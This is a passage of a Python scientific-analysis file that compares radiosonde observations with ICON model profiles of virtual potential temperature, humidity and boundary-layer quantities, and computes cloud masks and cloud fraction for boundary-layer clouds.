theta_v_resized.append(theta_v_radios_obs[indSoundings])
RH_resized.append(RH_radios_obs[indSoundings])
height_resized.append(height_radios_obs[indSoundings])
else:
P_resized.append(P_radios_obs[indSoundings][0:lenghtMin])
T_resized.append(T_radios_obs[indSoundings][0:lenghtMin])
RH_resized.append(RH_radios_obs[indSoundings][0:lenghtMin])
theta_v_resized.append(theta_v_radios_obs[indSoundings][0:lenghtMin])
height_resized.append(height_radios_obs[indSoundings][0:lenghtMin])
# building matrices
P_radiosonde_obs = np.reshape(P_resized, (lenghtMin, Nsoundings))
T_radiosonde_obs = np.reshape(T_resized, (lenghtMin, Nsoundings))
RH_radiosonde_obs = np.reshape(RH_resized, (lenghtMin, Nsoundings))
theta_v_radiosonde_obs = np.reshape(theta_v_resized, (lenghtMin, Nsoundings))
height_radiosonde_obs = np.reshape(height_resized, (lenghtMin, Nsoundings))
dict_radios = {'P':P_radiosonde_obs,
'T':T_radiosonde_obs,
'RH':RH_radiosonde_obs,
'theta_v':theta_v_radiosonde_obs,
'height':height_radiosonde_obs,
'time':time_radios_obs,
'lcl':lcl_radios_obs,
'ccl':ccl_radios_obs,
'lts':lts_radios_obs,
'pblHeight':pblHeight_radios_obs}
return(dict_radios)
# function to calculate mean theta_v from the model around the hours of the radiosondes and averaging
# =============================================================================
"""the function goes through the number of days of the dataset. For each day, it counts the number of
radiosonde launched and reads each of them. For each hour corresponding to a radiosonde of the day,
it calculates the mean quantities of the model around that hour (+-1 hour)
it then returns for every hour, a dictionary in which radiosonde data and
the corresponding mean model quantities are stored togehter.
Every dictionary associated to a given hour is appended to a list which is
piling all hours together, independently of the day.
each element of the list is a dictionary of an hour """
def f_calculateMeanThetaVModelProfiles(time_radiosondes, \
theta_v_radiosondes,\
T_radiosondes, \
rh_radiosObs, \
height_radiosondes, \
lcl_radiosondes, \
ccl_radiosondes, \
lts_radiosondes, \
pblHeight_radiosondes, \
theta_v_mod, \
T_mod, \
rh_mod, \
time_mod, \
height_mod, \
lcl_mod, \
ccl_mod,\
lts_mod, \
pblHeight_mod):
theta_v_dict_obs_mod_arr = []
# time_radiosondes is a list: every element of the list corresponds to a day,
# and for every dat there is a different number of radiosonde launched.
Ndays = len(time_radiosondes)
# loop on the number of days: for each day there is a different number of
# radiosondes launched (NdarDay)
for indDay in range(Ndays):
# finding the hour of each radiosonde launched
NradDay = len(time_radiosondes[indDay]) # number of radiosondes launched that day
# loop on the number of radiosonde of the day
for indRadDay in range(NradDay):
#print(indRadDay)
# reading the data of the selected radiosonde of the day
radioSondeSelected = time_radiosondes[indDay][indRadDay]
lcl_rad = lcl_radiosondes[indDay][indRadDay]
ccl_rad = ccl_radiosondes[indDay][indRadDay]
lts_rad = lts_radiosondes[indDay][indRadDay]
pblHeight_rad = pblHeight_radiosondes[indDay][indRadDay]
theta_v_rad = theta_v_radiosondes[indDay][:,indRadDay]
T_rad_day = T_radiosondes[indDay][:,indRadDay]
rh_rad_day = rh_radiosObs[indDay][:,indRadDay]
height_rad = height_radiosondes[indDay][:,indRadDay]
theta_v_day = theta_v_mod[indDay][:,:]
T_mod_day = T_mod[indDay][:,:]
rh_mod_day = rh_mod[indDay][:,:]
time_day = time_mod[indDay][:]
lcl_mod_day = lcl_mod[indDay][:]
ccl_mod_day = ccl_mod[indDay][:]
lts_mod_day = lts_mod[indDay][:]
pblHeight_mod_day = pblHeight_mod[indDay][:]
#lts_mod_day = lts_mod[:]
# reading exact hour of the radiosounding
hh = radioSondeSelected.hour
dd = radioSondeSelected.day
yy = radioSondeSelected.year
MM = radioSondeSelected.month
# defining the time interval around the hour to consider
# for calculating the average of the model
if hh == 23:
hourInf = datetime.datetime(yy,MM,dd,hh-2)
hourSup = datetime.datetime(yy,MM,dd,hh)
if hh == 0:
hourInf = datetime.datetime(yy,MM,dd,hh)
hourSup = datetime.datetime(yy,MM,dd,hh+2)
if (hh!= 23) * (hh!= 0):
hourInf = datetime.datetime(yy,MM,dd,hh-1)
hourSup = datetime.datetime(yy,MM,dd,hh+1)
#print(hh)
# calculate now mean profile of the theta_v from the model output
# corresponding to the selected time interval
# defining pandas dataframes
thetaV_DF = pd.DataFrame(theta_v_day, index=time_day, columns=height_mod)
T_mod_DF = pd.DataFrame(T_mod_day, index=time_day, columns=height_mod)
RH_mod_DF = pd.DataFrame(rh_mod_day, index=time_day, columns=height_mod)
lcl_mod_DF = pd.DataFrame(lcl_mod_day, index=time_day)
ccl_mod_DF = pd.DataFrame(ccl_mod_day, index=time_day)
lts_mod_DF = pd.DataFrame(lts_mod_day, index=time_day)
pblHeight_mod_DF = pd.DataFrame(pblHeight_mod_day, index=time_day)
# selecting the theta_v profiles in the time interval corresponding to the hour
field_sliced_t = thetaV_DF.loc[(thetaV_DF.index < hourSup) * (thetaV_DF.index >= hourInf),:]
theta_v_mod_mean = field_sliced_t.mean(axis=0, skipna=True)
theta_v_mod_std = field_sliced_t.std(axis=0, skipna=True)
field_sliced_T_mod = T_mod_DF.loc[(T_mod_DF.index < hourSup) * (T_mod_DF.index >= hourInf),:]
T_mod_mean = field_sliced_T_mod.mean(axis=0, skipna=True)
T_mod_std = field_sliced_T_mod.std(axis=0, skipna=True)
field_sliced_RH_mod = RH_mod_DF.loc[(RH_mod_DF.index < hourSup) * (RH_mod_DF.index >= hourInf),:]
RH_mod_mean = field_sliced_RH_mod.mean(axis=0, skipna=True)
RH_mod_std = field_sliced_RH_mod.std(axis=0, skipna=True)
lcl_slice = lcl_mod_DF.loc[(lcl_mod_DF.index < hourSup) * (lcl_mod_DF.index >= hourInf)]
lcl_mod_mean = lcl_slice.mean(skipna=True)
lcl_mod_std = lcl_slice.std(skipna=True)
ccl_slice = ccl_mod_DF.loc[(ccl_mod_DF.index < hourSup) * (ccl_mod_DF.index >= hourInf)]
ccl_mod_mean = ccl_slice.mean(skipna=True)
ccl_mod_std = ccl_slice.std(skipna=True)
lts_slice = lts_mod_DF.loc[(lts_mod_DF.index < hourSup) * (lts_mod_DF.index >= hourInf)]
lts_mod_mean = lts_slice.mean(skipna=True)
lts_mod_std = lts_slice.std(skipna=True)
pblHeight_slice = pblHeight_mod_DF.loc[(pblHeight_mod_DF.index < hourSup) * (pblHeight_mod_DF.index >= hourInf)]
pblHeight_mod_mean = pblHeight_slice.mean(skipna=True)
pblHeight_mod_std = pblHeight_slice.std(skipna=True)
dict_theta = {'theta_v_radios':theta_v_rad,
'T_radios':T_rad_day,
'RH_radios':rh_rad_day,
'height_rad':height_rad,
'theta_v_mod_mean':theta_v_mod_mean,
'theta_v_mod_std':theta_v_mod_std,
'T_mod_mean':T_mod_mean,
'T_mod_std':T_mod_std,
'RH_mod_mean':RH_mod_mean,
'rh_mod_std':RH_mod_std,
'date':radioSondeSelected,
'lcl_mod_mean':lcl_mod_mean,
'lcl_mod_std':lcl_mod_std,
'lcl_rad': lcl_rad,
'ccl_mod_mean': ccl_mod_mean,
'ccl_mod_std' : ccl_mod_std,
'ccl_rad':ccl_rad,
'lts_mod_mean':lts_mod_mean,
'lts_mod_std':lts_mod_std,
'lts_rad':lts_rad,
'pblHeight_mod_mean':pblHeight_mod_mean,
'pblHeight_mod_std':pblHeight_mod_std,
'pblHeight_rad':pblHeight_rad,
'hour':hh}
theta_v_dict_obs_mod_arr.append(dict_theta)
return(theta_v_dict_obs_mod_arr)
def f_calculateMeanProfilesPlotThetaVRadiosondes(theta_v_dict_obs_mod_arr, height_mod):
"""function to derive mean profiles for each hour at which radiosondes were launched
the first step is to sort the elements of the list of dictionaries
(each dictionary correspond to one radiosonde launched at a given hour) based
on the hour, so that we collect consequently same hours belonging to different days
"""
import operator
from collections import Counter
# sorting dictionary based on hours:
theta_v_dict_obs_mod_arr.sort(key=operator.itemgetter('hour')) #list of dictionaries ordered per hour
# counting how many profiles for each hour are present (on different days)
k = [i['hour'] for i in theta_v_dict_obs_mod_arr]
m = Counter(k)
k0 = 0
listHourDict = []
hourPrec = 0
# loop on hours found
for ind in range(len(k)):
hourSel = k[ind]
# if not the first hour of the loop
if hourSel != hourPrec:
hourPrec = hourSel
#print('hoursel', hourSel)
# counting how many profiles for each hour are present
Nprofiles = m[hourSel]
#print('Nprofiles', Nprofiles)
#print('k0', k0)
lenghtProf_radios = []
lenghtProf_mod = []
# loop on the number of "same" hours present to find out the
# lengths of the radiosonde profiles and of the modelled ones.
# Lengths are stored in length_mod and length_obs arrays
for iloop in range(k0, k0+Nprofiles):
#print('iloop', iloop)
lenghtProf_radios.append(len(theta_v_dict_obs_mod_arr[iloop]['theta_v_radios']))
lenghtProf_mod.append(len(theta_v_dict_obs_mod_arr[iloop]['theta_v_mod_mean']))
#print('lenght of the profiles', lenghtProf_radios)
#print('max lenght', np.max(lenghtProf_radios))
# defining matrices where to store all profiles collected for the hour on which the loop is running
# and the matrices where to calculate the mean profiles for the model data corresponding to the
# given hour. All matrices are filled with nans
MatrixProfiles_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
MatrixProfiles_mod = np.zeros((np.max(lenghtProf_mod), Nprofiles))
MatrixProfiles_T_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
MatrixProfiles_T_mod = np.zeros((np.max(lenghtProf_mod), Nprofiles))
MatrixProfiles_RH_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
MatrixProfiles_RH_mod = np.zeros((np.max(lenghtProf_mod), Nprofiles))
MatrixHeight_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
arr_lcl_hour_radios = np.zeros(Nprofiles)
arr_ccl_hour_radios = np.zeros(Nprofiles)
arr_lts_hour_radios = np.zeros(Nprofiles)
arr_pblHeight_hour_radios = np.zeros(Nprofiles)
arr_lcl_hour_mod = np.zeros(Nprofiles)
arr_ccl_hour_mod = np.zeros(Nprofiles)
arr_lts_hour_mod = np.zeros(Nprofiles)
arr_pblHeight_mod = np.zeros(Nprofiles)
MatrixProfiles_radios.fill(np.nan)
MatrixProfiles_mod.fill(np.nan)
MatrixProfiles_RH_radios.fill(np.nan)
MatrixProfiles_RH_mod.fill(np.nan)
MatrixProfiles_T_radios.fill(np.nan)
MatrixProfiles_T_mod.fill(np.nan)
MatrixHeight_radios.fill(np.nan)
arr_lcl_hour_radios.fill(np.nan)
arr_ccl_hour_radios.fill(np.nan)
arr_lts_hour_radios.fill(np.nan)
arr_pblHeight_hour_radios.fill(np.nan)
arr_lcl_hour_mod.fill(np.nan)
arr_ccl_hour_mod.fill(np.nan)
arr_lts_hour_mod.fill(np.nan)
arr_pblHeight_mod.fill(np.nan)
# loop on the number of profiles for the given hour to fill the data in the matrices
for iloop in range(Nprofiles):
#print('calculating mean for hour', hourSel)
#print(iloop+k0)
# filling mean profiles from the model (mean calculated around that hour)
MatrixProfiles_mod[0:len(theta_v_dict_obs_mod_arr[iloop+k0]['theta_v_mod_mean']),iloop]\
= theta_v_dict_obs_mod_arr[iloop+k0]['theta_v_mod_mean']
MatrixProfiles_T_mod[0:len(theta_v_dict_obs_mod_arr[iloop+k0]['T_mod_mean']),iloop]\
= theta_v_dict_obs_mod_arr[iloop+k0]['T_mod_mean']
MatrixProfiles_RH_mod[0:len(theta_v_dict_obs_mod_arr[iloop+k0]['RH_mod_mean']),iloop]\
= theta_v_dict_obs_mod_arr[iloop+k0]['RH_mod_mean']
# filling profiles from radiosondes
MatrixProfiles_radios[0:len(theta_v_dict_obs_mod_arr[iloop+k0]['theta_v_radios']),iloop]\
= theta_v_dict_obs_mod_arr[iloop+k0]['theta_v_radios']
MatrixProfiles_T_radios[0:len(theta_v_dict_obs_mod_arr[iloop+k0]['T_radios']),iloop]\
= theta_v_dict_obs_mod_arr[iloop+k0]['T_radios']
MatrixProfiles_RH_radios[0:len(theta_v_dict_obs_mod_arr[iloop+k0]['RH_radios']),iloop]\
= theta_v_dict_obs_mod_arr[iloop+k0]['RH_radios']
MatrixHeight_radios[0:len(theta_v_dict_obs_mod_arr[iloop+k0]['height_rad']),iloop]\
= theta_v_dict_obs_mod_arr[iloop+k0]['height_rad']
# filling values of lcl, lts and pbl from all radiosondes of the same hour from different days
arr_lcl_hour_radios[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['lcl_rad']
arr_ccl_hour_radios[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['ccl_rad']
arr_lts_hour_radios[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['lts_rad']
arr_pblHeight_hour_radios[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['pblHeight_rad']
# filling valued of lcl,lts and pbl from model mean already calculated
arr_lcl_hour_mod[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['lcl_mod_mean']
arr_ccl_hour_mod[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['ccl_mod_mean']
arr_lts_hour_mod[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['lts_mod_mean']
arr_pblHeight_mod[iloop] = theta_v_dict_obs_mod_arr[iloop+k0]['pblHeight_mod_mean']
#print('lts obs', arr_lts_hour_radios)
#print('lts mod', arr_lts_hour_mod)
# incrementing Ko of the number of profiles of the given hour to be ready to process the next hour
k0 = k0+Nprofiles
# calculating mean profiles of the model profiles collected around radiosondes
meanProfile_mod = np.nanmean(MatrixProfiles_mod, axis=1)
stdProfile_mod = np.nanstd(MatrixProfiles_mod, axis=1)
meanProfile_T_mod = np.nanmean(MatrixProfiles_T_mod, axis=1)
stdProfile_T_mod = np.nanstd(MatrixProfiles_T_mod, axis=1)
meanProfile_RH_mod = np.nanmean(MatrixProfiles_RH_mod, axis=1)
stdProfile_RH_mod = np.nanstd(MatrixProfiles_RH_mod, axis=1)
outDict = {'hour':hourSel, \
'Nprofiles':Nprofiles, \
'MatrixProfile_radios':MatrixProfiles_radios, \
'MatrixProfile_T_radios':MatrixProfiles_T_radios, \
'MatrixProfile_RH_radios':MatrixProfiles_RH_radios, \
'MatrixHeight_radios':MatrixHeight_radios, \
'meanProfile_mod':meanProfile_mod, \
'stdProfileMod':stdProfile_mod, \
'meanProfile_T_mod':meanProfile_T_mod, \
'stdProfile_T_Mod':stdProfile_T_mod, \
'meanProfile_RH_mod':meanProfile_RH_mod, \
'stdProfile_RH_Mod':stdProfile_RH_mod, \
'lcl_rad_hour':arr_lcl_hour_radios, \
'lcl_mod_hour':arr_lcl_hour_mod, \
'ccl_rad_hour': arr_ccl_hour_radios, \
'ccl_mod_hour': arr_ccl_hour_mod, \
'lts_rad_hour':arr_lts_hour_radios, \
'lts_mod_hour':arr_lts_hour_mod, \
'pblHeight_rad_hour':arr_pblHeight_hour_radios, \
'pblHeight_mod_hour':arr_pblHeight_mod, \
'n_lts_hour':len(arr_lts_hour_mod), \
'n_lts_hour_obs':len(arr_lts_hour_radios), \
'n_lcl_hour':len(arr_lcl_hour_mod), \
'n_lcl_hour_obs':len(arr_lcl_hour_radios)}
listHourDict.append(outDict)
# list of dictionaries: each dictionary contains a matrix with profiles of theta and height for that hour
## interpolating mean profiles and standard deviation from radiosounding on ICON height grid
gridHeight = height_mod[0]# np.arange(0.,8000., 5.) # grid of 5 m resolution in height
NgridInterp = len(gridHeight)
MatrixHourMeanProfileThetaRad = np.zeros((NgridInterp, len(listHourDict)))
MatrixHourStdProfileThetaRad = np.zeros((NgridInterp, len(listHourDict)))
MatrixHourMeanProfileTRad = np.zeros((NgridInterp, len(listHourDict)))
MatrixHourStdProfileTRad = np.zeros((NgridInterp, len(listHourDict)))
MatrixHourMeanProfileRHRad = np.zeros((NgridInterp, len(listHourDict)))
MatrixHourStdProfileRHRad = np.zeros((NgridInterp, len(listHourDict)))
MatrixHourMeanProfileThetaRad.fill(np.nan)
MatrixHourStdProfileThetaRad.fill(np.nan)
MatrixHourMeanProfileTRad.fill(np.nan)
MatrixHourStdProfileTRad.fill(np.nan)
MatrixHourMeanProfileRHRad.fill(np.nan)
MatrixHourStdProfileRHRad.fill(np.nan)
# loop on the hours: for each hour, we read a matrix of height and thetav from radiosondes
for indHour in range(len(listHourDict)):
MatrixHeightHour = listHourDict[indHour]['MatrixHeight_radios']
MatrixHourTheta = listHourDict[indHour]['MatrixProfile_radios']
MatrixHour_T = listHourDict[indHour]['MatrixProfile_T_radios']
MatrixHour_RH = listHourDict[indHour]['MatrixProfile_RH_radios']
sizeMatrix = np.shape(MatrixHourTheta)
Nradiosondes = sizeMatrix[1]
NheightsRad = sizeMatrix[0]
MeanProfileTheta = np.zeros((NgridInterp, Nradiosondes))
MeanProfileTheta.fill(np.nan)
MeanProfileT = np.zeros((NgridInterp, Nradiosondes))
MeanProfileT.fill(np.nan)
MeanProfileRH = np.zeros((NgridInterp, Nradiosondes))
MeanProfileRH.fill(np.nan)
# we loop on heights in radiosondes and we average for each model
# heigth grid box, the values of theta foudn in the radiosonde profiles
for indRadiosonde in range(Nradiosondes):
for indHeight in range(len(gridHeight)-1):
Hmax = gridHeight[indHeight]
Hmin = gridHeight[indHeight+1]
#print(Hmin,Hmax)
indFound = np.where((MatrixHeightHour[:,indRadiosonde] >= Hmin) *\
(MatrixHeightHour[:,indRadiosonde] < Hmax))
#print(indFound)
MeanProfileTheta[indHeight,indRadiosonde] = np.nanmean(MatrixHourTheta[indFound,indRadiosonde])
MeanProfileT[indHeight,indRadiosonde] = np.nanmean(MatrixHour_T[indFound,indRadiosonde])
MeanProfileRH[indHeight,indRadiosonde] = np.nanmean(MatrixHour_RH[indFound,indRadiosonde])
#print(MatrixHeightHour[indFound,indRadiosonde])
#print(MatrixHeightHour[:,indRadiosonde])
# calculating mean profile of theta V for observations
#mean_theta_V_radiosondes = np.mean()
#if hourSel == K0:
MatrixHourMeanProfileThetaRad[:, indHour] = np.nanmean(MeanProfileTheta, axis=1)
MatrixHourStdProfileThetaRad[:, indHour] = np.nanstd(MeanProfileTheta, axis=1)
MatrixHourMeanProfileTRad[:, indHour] = np.nanmean(MeanProfileT, axis=1)
MatrixHourStdProfileTRad[:, indHour] = np.nanstd(MeanProfileT, axis=1)
MatrixHourMeanProfileRHRad[:, indHour] = np.nanmean(MeanProfileRH, axis=1)
MatrixHourStdProfileRHRad[:, indHour] = np.nanstd(MeanProfileRH, axis=1)
return(MatrixHourMeanProfileThetaRad, MatrixHourStdProfileThetaRad, listHourDict, \
MatrixHourMeanProfileTRad, MatrixHourStdProfileTRad, MatrixHourMeanProfileRHRad, \
MatrixHourStdProfileRHRad)
def f_calPBLcloudMask(PBLcloud_dataset,time,height):
"""
author: Claudia Acquistapace
date : Friday 19 June 2020
goal : calculate cloud mask based on cloud base and cloud top time series provided as input. It is assumed that there
are 8 levels for cloud base/top identification i.e. np.shape(PBLcloud_dataset) = len(time),8
"""
# defining a new cloud mask based on the PBl cloud bases and tops
CB_matrix = PBLcloud_dataset.cloudBase.values
CT_matrix = PBLcloud_dataset.cloudTop.values
PBLtime = PBLcloud_dataset.time.values
PBL_cloudMask = np.zeros((len(time),len(height)))
for indTime in range(len(time)):
for indLev in range(8):
if (~np.isnan(CB_matrix[indTime, indLev])):
cb_height = CB_matrix[indTime, indLev]
ct_height = CT_matrix[indTime, indLev]
ind = (height >= cb_height) * (height <= ct_height)
PBL_cloudMask[indTime,ind] = 1
return(PBL_cloudMask)
def f_calculateCloudFractionPBLclouds(PBLcloudmask,time,height,Nmin_string):
'''
author: Claudia Acquistapace
date: friday 19 June 2020
goal: calculate cloud fraction from cloud mask over a given amount of minutes Nmin
input: PBLcloudmask: cloud mask matrix
time: time array corresponding to the cloud mask
height: height array corresponding to the cloud mask
Nmin: number of minutes over which to calculate the cloud fraction
output: CF_dataset = xr.Dataset({'CF': (['time','height'], CF_PBL)},
coords = {'time':datetime_CF,
'height':height})
'''
# calculating cloud fraction every 15 minutes
cloudMask_DF = pd.DataFrame(PBLcloudmask, index=time, columns=height)
datetime_CF = pd.date_range(start=time[0], end=time[-1], freq=Nmin_string+'min')
datetime_CF = datetime_CF.to_pydatetime()
CF_PBL = np.zeros((len(datetime_CF), len(height)))
for indTime in range(len(datetime_CF)-1):
mask_t = (cloudMask_DF.index > datetime_CF[indTime]) * (cloudMask_DF.index < datetime_CF[indTime+1])
Selection_cloudMask = cloudMask_DF[mask_t]
for indHeight in range(len(height)):
CFArray = Selection_cloudMask.loc[:,Selection_cloudMask.columns[indHeight]]
CF_PBL[indTime,indHeight] = len(CFArray[CFArray == 1])/len(CFArray)
CF_dataset = xr.Dataset({'CF': (['time','height'], CF_PBL)},
coords = {'time':datetime_CF,
'height':height})
return(CF_dataset) | ClauClouds/PBL_paper_repo | myFunctions.py | myFunctions.py | py | 168,788 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "datetime.dateti... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.